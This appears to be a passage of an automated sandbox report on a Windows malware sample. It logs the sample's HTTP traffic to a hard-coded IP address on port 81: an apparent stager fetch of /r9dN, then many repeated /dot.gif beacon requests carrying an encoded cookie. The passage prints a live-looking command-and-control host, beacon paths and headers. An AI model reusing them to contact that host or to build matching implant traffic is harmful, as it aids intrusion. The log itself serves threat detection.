            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: unknown
            TCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe
            Code function: 0_2_0388E3A4 _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,0_2_0388E3A4
            Source: global traffic
            HTTP traffic detected: GET /r9dN HTTP/1.1
            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch)
            Host: 47.121.190.121:81
            Connection: Keep-Alive
            Cache-Control: no-cache
            Source: global traffic
            HTTP traffic detected: GET /dot.gif HTTP/1.1
            Accept: */*
            Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
            Host: 47.121.190.121:81
            Connection: Keep-Alive
            Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
